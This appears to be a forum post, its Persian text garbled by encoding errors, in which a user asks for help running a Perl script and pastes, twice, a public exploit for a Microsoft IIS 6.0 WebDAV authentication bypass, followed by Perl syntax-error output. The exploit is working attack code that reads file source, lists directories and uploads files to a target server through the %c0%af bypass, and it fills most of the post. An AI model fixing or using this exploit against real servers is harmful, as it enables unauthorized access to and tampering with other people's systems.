سلام من خواستم این Ùایل پرل رو Run کنم ولی موÙÙ‚ نشدم
Warrning ها رو هم search کردم اما باز چیزی متوØÙ‡ نشدم
بنظرم باید کسی که perl می دونه یک بار source رو Trace کنه
و warrning ها :
Warrning ها رو هم search کردم اما باز چیزی متوØÙ‡ نشدم
بنظرم باید کسی که perl می دونه یک بار source رو Trace کنه
# Title: Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl)
# EDB-ID: 8806
# CVE-ID: ()
# OSVDB-ID: ()
# Author: ka0x
# Published: 2009-05-26
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print?
#!/usr/bin/perl -W
#
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
# Advisory: http://www.milw0rm.com/exploits/8765
#
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!
use IO::Socket ;
my ( $host, $path ) = @ARGV ;
my $port = 80 ; # webserver port
&usage unless $ARGV[1] ;
$host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ;
$path =~ s/\/// if(substr($path, 0,1) eq '/');
sub _file {
$file = shift ;
open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ;
while( <FILE> ){
$cont .= $_ ;
}
close(FILE) ;
return $cont ;
}
print "write 'help' for get help list\n";
while( 1 ) {
my $sock = IO::Socket::INET->new (PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
print "\$> ";
chomp( my $option = <STDIN> ) ;
last if $option eq 'quit' ;
if($option eq 'source') {
$path =~ s/\//%c0%af\// ;
print $sock "GET /".$path." HTTP/1.1\r\n" ;
print $sock "Translate: f\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock "Connection: close\r\n\r\n" ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
elsif($option eq 'path') {
$path =~ s/\//%c0%af\// ;
print $sock "PROPFIND /".$path." HTTP/1.1\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock "Connection:close\r\n" ;
print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
print $sock "Content-Length: 0\r\n\r\n" ;
print $sock '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
elsif($option eq 'put') {
$path =~ s/\//%c0%af\// ;
print "[*] Insert a local file (ex: /root/file.txt): " ;
chomp( $local = <STDIN> ) ;
$file_l = _file( $local ) ;
print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
print $sock "Connection:close\r\n" ;
print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
print $sock $file_l,"\r\n" ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
elsif($option eq 'help') {
print "\n\t\t- OPTIONS -\n\n\n" ;
print "\thelp\t\tgive this help list\n" ;
print "\tsource\t\tget file content\n" ;
print "\tpath\t\tget directory contents\n" ;
print "\tput\t\tput file\n" ;
print "\tquit\t\texit exploit\n\n" ;
}
}
sub usage {
print << 'EOH' ;
$ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
$ written by ka0x <ka0x01[at]gmail.com>
$ 25/05/2009
usage:
perl $0 <host> <path>
example:
perl $0 localhost dir/
perl $0 localhost dir/file.txt
EOH
exit;
}
__END__
# milw0rm.com [2009-05-26]
# EDB-ID: 8806
# CVE-ID: ()
# OSVDB-ID: ()
# Author: ka0x
# Published: 2009-05-26
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print?
#!/usr/bin/perl -W
#
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
# Advisory: http://www.milw0rm.com/exploits/8765
#
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!
use IO::Socket ;
my ( $host, $path ) = @ARGV ;
my $port = 80 ; # webserver port
&usage unless $ARGV[1] ;
$host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ;
$path =~ s/\/// if(substr($path, 0,1) eq '/');
sub _file {
$file = shift ;
open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ;
while( <FILE> ){
$cont .= $_ ;
}
close(FILE) ;
return $cont ;
}
print "write 'help' for get help list\n";
while( 1 ) {
my $sock = IO::Socket::INET->new (PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
print "\$> ";
chomp( my $option = <STDIN> ) ;
last if $option eq 'quit' ;
if($option eq 'source') {
$path =~ s/\//%c0%af\// ;
print $sock "GET /".$path." HTTP/1.1\r\n" ;
print $sock "Translate: f\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock "Connection: close\r\n\r\n" ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
elsif($option eq 'path') {
$path =~ s/\//%c0%af\// ;
print $sock "PROPFIND /".$path." HTTP/1.1\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock "Connection:close\r\n" ;
print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
print $sock "Content-Length: 0\r\n\r\n" ;
print $sock '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
elsif($option eq 'put') {
$path =~ s/\//%c0%af\// ;
print "[*] Insert a local file (ex: /root/file.txt): " ;
chomp( $local = <STDIN> ) ;
$file_l = _file( $local ) ;
print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
print $sock "Connection:close\r\n" ;
print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
print $sock $file_l,"\r\n" ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
elsif($option eq 'help') {
print "\n\t\t- OPTIONS -\n\n\n" ;
print "\thelp\t\tgive this help list\n" ;
print "\tsource\t\tget file content\n" ;
print "\tpath\t\tget directory contents\n" ;
print "\tput\t\tput file\n" ;
print "\tquit\t\texit exploit\n\n" ;
}
}
sub usage {
print << 'EOH' ;
$ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
$ written by ka0x <ka0x01[at]gmail.com>
$ 25/05/2009
usage:
perl $0 <host> <path>
example:
perl $0 localhost dir/
perl $0 localhost dir/file.txt
EOH
exit;
}
__END__
# milw0rm.com [2009-05-26]
H:\perl\bin>perl h:\1.pl
Bareword found where operator expected at h:\1.pl line 76, near "print $sock '<
?xml"
(Might be a runaway multi-line ?? string starting on line 13)
(Do you need to predeclare print?)
Bareword found where operator expected at h:\1.pl line 76, near ""1.0" encoding"
(Missing operator before encoding?)
syntax error at h:\1.pl line 76, near "print $sock '<?xml version"
Bad name after put' at h:\1.pl line 85.
Bareword found where operator expected at h:\1.pl line 76, near "print $sock '<
?xml"
(Might be a runaway multi-line ?? string starting on line 13)
(Do you need to predeclare print?)
Bareword found where operator expected at h:\1.pl line 76, near ""1.0" encoding"
(Missing operator before encoding?)
syntax error at h:\1.pl line 76, near "print $sock '<?xml version"
Bad name after put' at h:\1.pl line 85.
Comment